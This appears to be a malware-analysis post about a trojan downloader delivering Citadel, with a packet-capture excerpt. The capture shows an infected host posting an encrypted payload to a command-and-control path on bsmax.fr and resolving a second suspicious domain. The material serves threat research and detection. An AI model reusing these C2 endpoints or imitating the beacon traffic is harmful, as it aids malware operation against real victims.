DLL.exe Trojan Downloader Loads Citadel and Unknown Malware

PCAP file download

2016-09-20 02:28:08.567628 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [P.], seq 0:694, ack 1, win 256, length 694: HTTP: POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1
E…st………f..!….P..(…d.P…~…POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: bsmax.fr
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 60gpBAK=R1224197954; 60gp=R1864059519

8.,…….@M0..GH.#..RS.. ..g.2..g…;…yLb…..]\..p..4…..Qo..t..Ba……..N..\.p’~.X.o.}z*…[…jA…L…#..T……..hq.$.zx[……!..Z.{D4.o.r..~)..z?.M.h.%……,.`O…=bpI}..V/UJ._XX..0v9..C.d.b…3..f.{}…………..i1…Y…<….5IR&.”…9EX\.h..X.f…Z..*.)Q.1…k?tf#[@.^..W…….+.J..Rg…..}….2…y..:…;..I;…,…..H.}….{8..,…&#(*.Pp…*…#..I…7.Y2..L.m…./…a…8…………….a.2.

2016-09-20 02:28:08.854990 IP 192.168.1.102.51387 > 75.75.75.75.53: 10218+ A? judo-club-solesmois-59.fr. (43)
E..G,……~…fKKKK…5.39]’…………judo-club-solesmois-59.fr…..

2016-09-20 02:28:08.894800 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [.], ack 407, win 255, length 0
E..(su………f..!….P..*…e.P…?G……..

2016-09-20 02:28:09.049012 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [S], seq 1303459062, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], […]